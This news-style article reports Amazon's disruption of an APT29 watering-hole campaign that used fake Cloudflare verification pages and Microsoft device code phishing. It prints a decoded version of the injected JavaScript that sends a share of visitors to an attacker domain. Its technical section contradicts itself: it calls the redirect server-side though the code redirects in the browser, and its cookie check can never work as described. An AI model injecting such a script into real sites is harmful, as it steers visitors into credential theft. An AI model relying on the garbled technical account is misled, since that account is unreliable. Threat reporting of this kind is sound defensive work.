Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

Cybersecurity: Amazon’s Disruption of APT29 Infrastructure

In late August 2025, Amazon’s threat intelligence team identified a sophisticated watering hole campaign orchestrated by APT29, a group linked to the Russian Foreign Intelligence Service. The operation involved compromising legitimate websites to redirect unsuspecting visitors to malicious infrastructure.

Once redirected, users encountered counterfeit Cloudflare verification pages designed to harvest credentials and trick victims into authorizing attacker-controlled devices through Microsoft’s device code authentication flow.

The campaign impacted approximately 10 percent of site visitors, redirecting them to domains like findcloudflare[.]com and cloudflare.redirectpartners[.]com. These domains mimicked official security checks, deceiving many users.

Amazon analysts observed a significant evolution in APT29’s tradecraft. The group used opportunistic injection of obfuscated JavaScript into compromised sites, broadening their potential victim pool by embedding malicious redirects directly into popular web pages. Visitors were often unaware of being rerouted until prompted to enter device codes or approve new device authorizations, granting the threat actor persistent access.

The campaign’s impact extended beyond credential theft. By integrating with Microsoft’s device code authentication, APT29 could persist within corporate environments, leveraging authorized sessions to move laterally and gather intelligence. Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.

Amazon collaborated with Cloudflare, Microsoft, and other providers to dismantle the malicious domains and isolate compromised EC2 instances, illustrating the power of coordinated industry response.

Technical Overview of Obfuscated JavaScript

The injected script utilized advanced evasion techniques. The JavaScript payload was base64-encoded, and randomization logic redirected only a subset of visitors, reducing detection likelihood. Once decoded, the script performed a server-side redirect to the fraudulent authentication page while setting cookies to prevent repeated redirects of the same user. A simplified version of the decoded code is provided below:

(function(){
    var uid = Math.random().toString(36).substring(2);
    if (!document.cookie.includes('redir='+uid) && Math.random()<0.1) {
        document.cookie = 'redir='+uid+';path=/';
        window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
    }
})();

This snippet exemplifies APT29’s shift from client-side to server-side redirects when previous infrastructure was disrupted. By rapidly migrating to new domains and refining their code, the group sustained their campaign despite ongoing takedowns.

Amazon’s successful disruption of this infrastructure highlights the necessity for continuous monitoring of web-based threats and collaboration across the security community.